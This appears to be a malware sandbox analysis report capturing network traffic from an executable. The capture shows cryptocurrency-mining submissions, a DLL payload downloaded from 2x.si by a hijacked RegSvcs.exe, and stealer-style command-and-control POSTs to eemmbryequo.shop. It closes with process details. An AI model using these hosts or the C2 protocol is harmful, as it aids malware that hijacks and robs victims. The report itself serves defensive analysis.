Sep 19, 2024 02:41:59.647903919 CEST	255	OUT	Data Raw: 7b 22 69 64 22 3a 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 73 75 62 6d 69 74 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 62 62 37 37 36 63 37 32 2d 32 34 33 33 2d 34 64 33 36 2d 62 65 39 37 2d Data Ascii: {"id":3,"jsonrpc":"2.0","method":"submit","params":{"id":"bb776c72-2433-4d36-be97-15f3ed831aca","job_id":"77249c1d-8557-445f-a487-b86a893d10ca","nonce":"8c060200","result":"3965c147df71b03c2002bd52da7f68176107ce1cfd2969b68e03129c49a00000","alg
Sep 19, 2024 02:41:59.823169947 CEST	71	IN	Data Raw: 7b 22 69 64 22 3a 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 2d 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 73 68 61 72 65 22 7d 7d 0a Data Ascii: {"id":3,"jsonrpc":"2.0","error":{"code":-1,"message":"Invalid share"}}
Sep 19, 2024 02:42:01.090085030 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 64 65 36 61 64 62 37 30 36 62 36 33 65 61 39 33 66 61 32 61 66 65 32 65 61 66 34 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cde6adb706b63ea93fa2afe2eaf412484edbdb88c2a5a6123561e8a93e8e83420abbc78594000000001b29892955aaee1d3334e353d4242c2def1d0b07e2d83b90ee2a9253aa83be9876","job_id":"fe63f70e-70af-4747-9769-ddf6d
Sep 19, 2024 02:42:04.369103909 CEST	255	OUT	Data Raw: 7b 22 69 64 22 3a 34 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 73 75 62 6d 69 74 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 62 62 37 37 36 63 37 32 2d 32 34 33 33 2d 34 64 33 36 2d 62 65 39 37 2d Data Ascii: {"id":4,"jsonrpc":"2.0","method":"submit","params":{"id":"bb776c72-2433-4d36-be97-15f3ed831aca","job_id":"fe63f70e-70af-4747-9769-ddf6dd4af8c5","nonce":"ec020200","result":"a8edab5d955b4b73dfa8a4dce03da0abcaeccdbfa1d2f743822808ad52510000","alg
Sep 19, 2024 02:42:04.546415091 CEST	71	IN	Data Raw: 7b 22 69 64 22 3a 34 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 2d 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 73 68 61 72 65 22 7d 7d 0a Data Ascii: {"id":4,"jsonrpc":"2.0","error":{"code":-1,"message":"Invalid share"}}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.30	49842	172.67.143.156	443	8344	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-19 00:41:42 UTC	62	OUT	GET /o3M.dll HTTP/1.1 Host: 2x.si Connection: Keep-Alive
2024-09-19 00:41:43 UTC	650	IN	HTTP/1.1 200 OK Date: Thu, 19 Sep 2024 00:41:42 GMT Content-Type: application/octet-stream Content-Length: 2355928 Connection: close accept-ranges: bytes etag: "666e0473-23f2d8" last-modified: Sat, 15 Jun 2024 21:15:31 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OqdCBTnO7ek8qVE71sRIPjEa9p0fqgdaPSOkgQannWJSIWVPwAKMJ7y40EWh2to1qY5qss61OqLBg3nb21YLe1QuUIZxYfA6L%2FzVWqHgsRskuZOzRELXJg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c558819baea422e-EWR alt-svc: h3=":443"; ma=86400
2024-09-19 00:41:43 UTC	719	IN	Data Raw: 6b 80 b9 56 59 d2 3d 4b 33 f2 eb 9b 13 69 f9 b4 3e f9 75 8c 7c 7a df b4 7e 51 90 77 e7 9a 50 12 45 12 c5 cc d3 3a 30 2c ea 41 a7 34 e0 4a ac 94 6b 94 53 09 ae ca cc ac 10 ce 0e 21 e5 0d b3 44 d8 de f9 f4 97 cc 3b 4c 9a 85 d7 f9 25 48 b9 13 8e 85 71 b3 8a b6 00 ed eb a0 b4 d0 61 1d e6 4d 93 87 02 73 3b 7f d1 0b 22 9a f6 79 55 0e 38 d2 15 99 00 2b 08 ab e4 94 83 06 d7 e3 b5 dc e7 e8 e2 5e ee 81 df 27 32 b5 92 87 87 d3 49 c4 13 a7 a8 98 25 b8 aa f0 9e 50 69 e4 d6 49 6b 86 c7 58 36 3a f2 b8 dd f0 22 33 3d df 85 a8 0e 07 11 77 3e 70 4c d7 68 12 94 76 27 ab 8d 8c f1 34 fe 88 95 8a d8 f4 bd d4 84 1c dc 3e 2b a7 94 48 bb ee cc 47 54 a9 fb 53 22 7f 62 db 69 03 7a a4 9d 88 56 55 84 d8 67 4f b9 44 8d 95 ac 75 8c da d9 c2 dc 2a d4 9c b8 b9 ac 17 82 50 13 fb a0 65 05 Data Ascii: kVY=K3i>u\|z~QwPE:0,A4JkS!D;L%HqaMs;"yU8+^'2I%PiIkX6:"3=w>pLhv'4>+HGTS"bizVUgODu*Pe
2024-09-19 00:41:43 UTC	1369	IN	Data Raw: 2c 66 15 c1 59 7a 02 61 c6 fe 16 8d bb d7 f8 9c c6 3e 19 63 21 81 29 bf 74 0c 1a 50 61 8d e8 cd 4e fe 6b 27 88 27 bd 36 b8 dd 76 c7 a3 5c 11 3f 20 fe 93 4e b8 60 04 c6 7e 98 59 60 5f 41 c5 14 a4 e2 7a 97 8b 19 c2 b7 55 52 31 cc c7 43 f8 5b a5 55 ef 5a cd ce 00 d9 bd 55 3d 56 12 78 a8 46 ef 97 64 cd 81 ec bf 7a 14 e5 b7 74 a6 6c 08 a9 70 3a f0 45 5d fa 01 f1 d4 b8 5b d3 9d 15 b3 dd a2 3c c7 be 4a 26 47 70 5c 3f b5 b3 9f 14 e5 9b 6e 3f 39 6a 64 e2 4d 81 52 41 28 e2 12 8b 75 88 82 c3 96 56 9c ed 2e e2 9e 77 46 d2 82 0a f6 c9 ae 08 55 c8 01 60 b9 14 32 d4 b2 51 ab c8 ba 55 7f 03 9c 57 c4 cc 31 3b cd c4 f9 56 07 28 2b a5 9c 74 4a b7 9c 46 28 8b ed d3 4e d8 46 46 50 fe 1d 05 5e 96 a6 78 b2 52 2b db f6 c4 d4 6a 01 e7 cf 00 30 1a 34 47 f5 19 65 b5 07 0c 1d 38 48 Data Ascii: ,fYza>c!)tPaNk''6v\? N`~Y`_AzUR1C[UZU=VxFdztlp:E][<J&Gp\?n?9jdMRA(uV.wFU`2QUW1;V(+tJF(NFFP^xR+j04Ge8H
2024-09-19 00:41:43 UTC	1369	IN	Data Raw: 63 c3 14 5b a6 ae 79 32 8b 5c a5 9d a1 71 ce 07 33 03 c0 f3 ae 03 cd 70 6d 8c d1 d5 18 1f ad 49 1f c4 1e 7d c3 dc 59 80 ea a0 d2 c5 4a b0 ff b9 e9 f7 f4 36 2b 2c 0e 3a 24 28 55 72 70 d7 38 0f 18 df 8a 08 03 26 17 e8 d4 72 fa e0 ce 4b 31 9d c0 64 b1 7c dc 51 9e 7f 65 bc 26 cb 04 43 a3 ca 8d a5 7c a8 9e a7 ed 9a 7c 63 2d 94 d7 3e e0 8e 68 78 d5 8d 4b ec e3 ad 3a 59 50 6d 2c 4f 17 72 88 90 d9 b3 6c cf c1 67 98 5f 10 50 d1 b2 5a 50 6f 9a 9f 2b 6a b7 40 65 cb eb db 46 c4 4c 76 d3 3a e4 19 47 83 6c 71 3d f7 af 0c dc f7 af 03 14 42 d4 33 cc 5b 74 74 4f 42 4e 49 0d c3 3e fe 88 c7 02 b0 49 e4 6b cd 78 43 b7 20 61 82 14 89 db 92 63 dc 38 0a bb 9b 2e 33 23 1a f9 43 62 7c 5d fd 0e 85 4c d8 63 56 61 28 94 89 03 8d 34 48 71 49 d2 54 b6 79 44 a9 6e 3c f5 9b 8f 31 a5 5c Data Ascii: c[y2\q3pmI}YJ6+,:$(Urp8&rK1d\|Qe&C\|\|c->hxK:YPm,Orlg_PZPo+j@eFLv:Glq=B3[ttOBNI>IkxC ac8.3#Cb\|]LcVa(4HqITyDn<1\
2024-09-19 00:41:43 UTC	1369	IN	Data Raw: 1e 5f a5 e9 a9 9f 85 f1 89 3b 33 9c 6b fb de df f1 9d 0d b1 b0 5c 3f 1b 85 bc 6f 15 80 a8 6c ef a0 4f 85 27 58 06 1f 99 fb 7b 8b 6a cd 3b 48 39 51 5a fd d2 5a 7e 79 fe 7f 72 70 ac 50 4f c0 90 79 2e b8 30 2d 58 2e d5 e3 ab 13 9d 1a b2 da 68 d4 fb 58 2e ba cd e2 2f 27 51 9c 79 d0 78 8a 02 ea c0 42 af 4a 2e 45 2f e3 08 33 41 f1 25 29 a1 2a d8 45 1e 84 6c e2 95 ae 3e c5 39 86 b9 ac eb aa ff 2d ee a2 55 cf 5d 39 e8 2c ab 25 98 86 69 42 d4 51 6b da fd 79 e0 4e df 54 e2 4c 5b ed d8 79 a6 c9 ce 97 9a 49 30 fb 7c 3e 80 61 3b aa 38 a6 f4 88 86 93 de 18 35 0f 5b b6 66 c5 31 a3 70 3d 35 be 8e 30 98 4c 48 bb b0 4a ac ad 48 4f a6 a0 f5 d7 04 c6 5f 4a eb 46 a5 5f 48 53 65 b7 42 46 68 4b a5 aa 9e b5 3f 8b 05 e1 98 65 89 dd 47 87 2f 6f ec 48 bd 46 a4 a1 51 a9 a6 36 a2 d2 Data Ascii: _;3k\?olO'X{j;H9QZZ~yrpPOy.0-X.hX./'QyxBJ.E/3A%)*El>9-U]9,%iBQkyNTL[yI0\|>a;85[f1p=50LHJHO_JF_HSeBFhK?eG/oHFQ6
2024-09-19 00:41:43 UTC	1369	IN	Data Raw: 42 96 f6 6e 19 51 ae ba a1 d1 1c d4 c7 5b 11 75 25 c8 e6 5c bf 77 cc 88 94 d8 ad 18 51 fc ac 97 48 26 bf 94 be 1c 27 c2 08 3d 32 a3 8b d1 42 3b 7a 10 70 b9 27 ef a1 e8 a3 d0 4e 48 25 4d a8 7a fe 7a ee be 5e ee d3 21 33 45 3a cf 41 f4 4a ac 66 9b 62 2f 55 52 0b 97 4f 23 fe b9 74 c3 a3 be 12 2d 04 e2 54 c4 bc b2 63 dd ec 7e 99 bb 6e 17 04 e8 22 52 16 6a 07 dc 27 30 89 17 92 f5 c8 9b f5 b1 5f 9a db 9e df d2 1c e2 11 ea 4b 5e 3a ea a1 b1 23 6a de 25 fd 72 2f 60 09 9c b3 4e cd 6e 4f 4a da b1 a1 30 76 3a 3a 0d 03 a5 af b7 10 85 be f5 75 73 69 3b 1f 72 7a 9a c8 9e 19 9a a0 06 e2 af d6 8a 89 fb 33 e1 38 6a 2d 2a 1a 89 85 b3 ba 15 01 6c 37 d8 6e 52 3e b3 d8 2c ef 91 cc 24 62 d2 91 b3 11 ef 5e 8c cc 6e e2 71 b0 8d 44 bd fb 42 38 3d a3 19 f5 c1 e9 8d 55 dc 1e 70 58 Data Ascii: BnQ[u%\wQH&'=2B;zp'NH%Mzz^!3E:AJfb/URO#t-Tc~n"Rj'0_K^:#j%r/`NnOJ0v::usi;rz38j-*l7nR>,$b^nqDB8=UpX
2024-09-19 00:41:43 UTC	1369	IN	Data Raw: f4 2c 3a a3 5c cb a9 d2 0e 00 03 0b dc 43 8b a7 93 96 60 eb d7 5a 64 36 bb 38 a9 71 21 68 b7 65 f0 ac 5a 41 da 50 a2 41 9f bf 9e 2f c4 d4 a9 3a 9f 16 77 4b ff c8 01 f8 a2 36 38 16 2b c0 57 b6 7b 83 ad e5 f4 af 4e 63 d9 9d 35 20 98 fb 3c 59 6d 8d 07 a0 c4 d4 63 0f b5 41 4c 67 10 27 8e a2 50 2f 5b 6e 19 99 6a de 3b b8 5a 45 9f ab 62 60 a5 f2 54 44 aa e5 c5 3a 9e d1 c5 00 d6 a5 c9 95 b6 4f 11 a0 43 4a 50 5d 7f a3 5e 13 35 e2 c2 99 57 83 a7 eb 5d d3 2a 24 10 94 99 99 61 81 e7 1c 0f 55 d2 f0 57 32 fc 0d bc 52 93 52 8b 4d 8e 45 b4 a3 c9 fc a2 94 1f b9 64 58 0f 4a 7b 36 80 4d 3a b8 bc 9f 98 5c 1b 86 db df c8 c5 f0 06 fc af 8d 73 77 a1 2c 0a 26 48 87 56 56 7c 3f 25 ce ff 39 a1 b6 46 27 48 84 4c 13 97 0a 93 af 54 66 6f cd 06 f6 59 eb 66 8b 29 99 67 24 5c 4e 0f bd Data Ascii: ,:\C`Zd68q!heZAPA/:wK68+W{Nc5 <YmcALg'P/[nj;ZEb`TD:OCJP]^5W]*$aUW2RRMEdXJ{6M:\sw,&HVV\|?%9F'HLTfoYf)g$\N
2024-09-19 00:41:43 UTC	1369	IN	Data Raw: 90 ef 38 d9 71 95 ab 09 05 31 2a 14 0f 79 12 22 37 47 40 5f 44 46 fa 4d df 8f 55 37 61 d9 7e d5 ea 27 bf 7d f9 f1 46 d4 b5 fb 0f 3d 88 ea b5 52 77 d4 67 5f 9b e4 20 08 e1 8a fb 45 ef 34 0b 4e 5e 38 a8 4f 8e 0f f6 eb 48 1c 05 3f 29 05 51 8a f3 70 29 1d f9 67 dc 5b c1 d7 c7 61 ea ad 24 17 b0 a6 5a 6b 6f 91 3e 92 a0 33 c9 cc 12 8b e3 4e 98 77 fb fc 0f ed a1 54 43 e0 b0 7f 24 0e fd a9 94 4a e6 88 15 7a ae 31 f9 91 b1 90 4f 65 82 b2 34 f3 e7 72 98 6c c8 6f 1c ea ad 5c f9 56 ac ac 47 80 9e 46 4e 06 bf 04 22 fe 01 a0 71 73 85 e6 0c 5e b5 42 29 d1 21 c4 25 6b 2a 18 88 fc 77 a8 76 1c d4 9c 77 45 c1 e6 b5 82 cb 55 1e 4f 62 8f 21 9e 61 53 8b ea 03 a2 59 2b dc cd fd 33 f7 60 a2 b8 8e 1f 0d d7 5a f3 15 88 c1 4b f7 49 a6 1a 5a 46 6e ec 0e f3 7a 1f 51 24 84 b5 2c e9 a2 Data Ascii: 8q1y"7G@_DFMU7a~'}F=Rwg_ E4N^8OH?)Qp)g[a$Zko>3NwTC$Jz1Oe4rlo\VGFN"qs^B)!%kwvwEUOb!aSY+3`ZKIZFnzQ$,
2024-09-19 00:41:43 UTC	1369	IN	Data Raw: 8d db 17 2d 6e 54 4e 53 c8 3e 80 aa 60 aa b8 f8 19 5e 74 e3 d9 4e c8 88 c4 95 9d af 77 4a 73 85 cd 71 12 2d a4 f7 a0 06 ef b0 09 80 2c 51 3b cf 0b 5e d6 f9 15 07 5c 69 a5 de e9 ab 1c 6c 02 98 50 ae 97 64 46 d4 ba 4e 8e 2e da ee 7f 02 51 73 ab da ef 7c ba b0 b7 13 25 61 df 2c 36 ca 41 6a 23 cd c4 c0 3e 28 53 c5 d8 7f ed a6 27 40 b6 dc 14 a9 32 dd e5 66 c0 cb 0d d0 5a e9 a3 90 eb 5e b1 11 5e 67 4b ce 24 e7 57 27 9c ca 78 9d 58 c3 3c c3 b9 71 4b 64 ce ac 13 01 cc ad 2a bc 77 7a 77 02 a6 ae c5 a9 97 11 49 1d 31 a2 dd 7a 31 76 ba d7 97 ac 95 6e e0 eb 5d c4 da fd 21 89 5d 27 e2 5e f7 e4 9e 28 4f 87 ee a4 0d 52 28 59 da 77 14 96 75 b2 fa 1d 2a 40 eb 3f 19 4d 5b e0 99 8e 9b 83 20 e5 80 e5 42 fb 2f 0a 53 5b c8 13 73 8d 6d 8a bf 41 0f 38 f6 c6 65 1d ea 39 3d a7 1f Data Ascii: -nTNS>`^tNwJsq-,Q;^\ilPdFN.Qs\|%a,6Aj#>(S'@2fZ^^gK$W'xX<qKdwzwI1z1vn]!]'^(OR(Ywu@?M[ B/S[smA8e9=
2024-09-19 00:41:43 UTC	1369	IN	Data Raw: d4 d0 e8 90 10 6f db 2d eb 0c 90 c6 0b ef 66 18 0a 12 cc 73 a7 cc 1f 51 c1 69 e4 d7 03 10 45 0e f1 f2 30 e3 28 67 24 85 c1 9b 8c b3 9d fd e1 90 3f 26 eb 3a a2 53 11 75 a1 34 cd d2 a9 74 65 c4 ef 4e c7 ef 4f 53 bd 14 84 d6 09 cf fb 66 5d 56 62 dd 70 7f 0e e3 ae 98 ad 60 9a d5 bf 41 57 1c bc fa ae 35 2b 42 1b 9f 4a 97 39 1f 03 cd 77 03 3a 39 84 24 62 5a 1c 5b 52 4d 25 4d ff 96 5e 8b fe a6 ee 88 41 80 e3 86 02 c9 5e 2c 7c 8e f6 0a 34 30 ef d5 18 2b b6 da 7b 9b b0 a6 ab 5a d1 dd 3f f6 da ef 92 39 85 70 0e 1c 4c de 99 87 1b 42 10 57 02 a9 2b 36 99 c1 ae d7 1c bc 5d 03 75 39 cd 11 22 46 67 b8 b7 05 58 20 9d e3 2e f7 7e 31 5f d3 2e 33 46 69 86 38 c1 86 5b 6d 7f e8 a7 d1 f5 96 62 da 3b 9c d7 0c 81 e9 8a 78 c1 ef 88 d5 05 0f ec 35 9f 32 1e 48 38 97 8b df 34 6b c8 Data Ascii: o-fsQiE0(g$?&:Su4teNOSf]Vbp`AW5+BJ9w:9$bZ[RM%M^A^,\|40+{Z?9pLBW+6]u9"FgX .~1_.3Fi8[mb;x52H84k
2024-09-19 00:41:43 UTC	176	IN	Data Raw: 11 48 d0 b1 57 ea 11 f4 54 7b 5d 68 3a 7c a3 ca e3 1b 09 b8 0e 95 19 3b 34 cb 5b 57 db 68 5a 20 cf 7c c3 f8 89 fc d8 ec 8c 03 ff ad c6 3a 9e eb c0 26 28 b5 df df 28 73 8e a0 cf e6 84 76 8d 08 98 01 d5 bf 51 4f 8e f6 39 f9 0d 1b be ab 51 37 12 0f ac a9 d3 03 93 65 0b 8d 9e 50 dc 30 5f 39 9a c2 da fb 53 59 f3 58 1d ad 23 39 ad 82 39 ea 64 f2 7f 72 fd 78 43 a3 a9 4b 42 58 9a 1f 53 6d 21 05 e5 e4 45 34 c4 d4 72 48 5a fc 7f de 0b f6 7f 7c 3a d3 14 81 6a 49 63 1e e1 19 37 16 26 a0 49 ea e3 c9 44 15 ef 13 04 27 fc 2d 69 9d 22 9a Data Ascii: HWT{]h:\|;4[WhZ \|:&((svQO9Q7eP0_9SYX#99drxCKBXSm!E4rHZ\|:jIc7&ID'-i"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.30	49856	172.67.142.26	443	9052	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-19 00:42:04 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: eemmbryequo.shop
2024-09-19 00:42:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-19 00:42:04 UTC	549	IN	HTTP/1.1 200 OK Date: Thu, 19 Sep 2024 00:42:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Rel%2Biy88Mc7Rn5NX3XdIOJLvIL3G4ZC72Z2s%2FW3SEmokWxiWmgqUTD7PJ2UeTNMnpiAdXV8l%2Ba4ZV%2BF8sMXmoN3bjXNiSTUr2x3HVzoeweZ4s1GeQVJ0o%2BLaj2zOdhswFJl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c55889fed2643f9-EWR
2024-09-19 00:42:04 UTC	820	IN	Data Raw: 31 31 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1130<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-19 00:42:04 UTC	1369	IN	Data Raw: 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 Data Ascii: .errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie
2024-09-19 00:42:04 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 31 38 36 69 70 39 57 34 4c 61 4f 4c 47 7a 52 36 4f 4a 33 49 59 6b 74 35 77 4a 56 65 61 45 33 38 77 78 74 59 61 37 48 57 67 46 6b 2d 31 37 32 36 37 30 36 35 32 34 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c Data Ascii: <input type="hidden" name="atok" value="186ip9W4LaOLGzR6OJ3IYkt5wJVeaE38wxtYa7HWgFk-1726706524-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" styl
2024-09-19 00:42:04 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-09-19 00:42:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.30	49857	172.67.142.26	443	9052	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-19 00:42:04 UTC	353	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=186ip9W4LaOLGzR6OJ3IYkt5wJVeaE38wxtYa7HWgFk-1726706524-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: eemmbryequo.shop
2024-09-19 00:42:04 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 76 30 66 52 75 2d 2d 26 6a 3d 62 34 66 30 31 37 37 37 65 64 63 38 35 31 61 61 34 37 62 64 64 62 30 31 61 35 62 39 34 32 66 37 Data Ascii: act=recive_message&ver=4.0&lid=hv0fRu--&j=b4f01777edc851aa47bddb01a5b942f7
2024-09-19 00:42:05 UTC	798	IN	HTTP/1.1 200 OK Date: Thu, 19 Sep 2024 00:42:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bsj0ebdhtq6mt8cid6jpogr6b5; expires=Sun, 12 Jan 2025 18:28:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UHZ64FNpHaJnhIVEaWmAicS3yx%2BIlw%2FGAEVMIgoCNsobZfvkbdfFRB9H2zVy36k%2BsHal8%2B31oMdXG33D3cTtcjvj6xcOqFL049a1dYIxeZdL51Y1wzPxYTSVfRdW8ysLuzys"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c5588a3893b1784-EWR alt-svc: h3=":443"; ma=86400
2024-09-19 00:42:05 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-19 00:42:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	20:41:29
Start date:	18/09/2024
Path:	C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe"
Imagebase:	0x330000
File size:	1'319'800 bytes
MD5 hash:	8199C105289D70AF5446C7FD64496D7B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	20:41:29
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
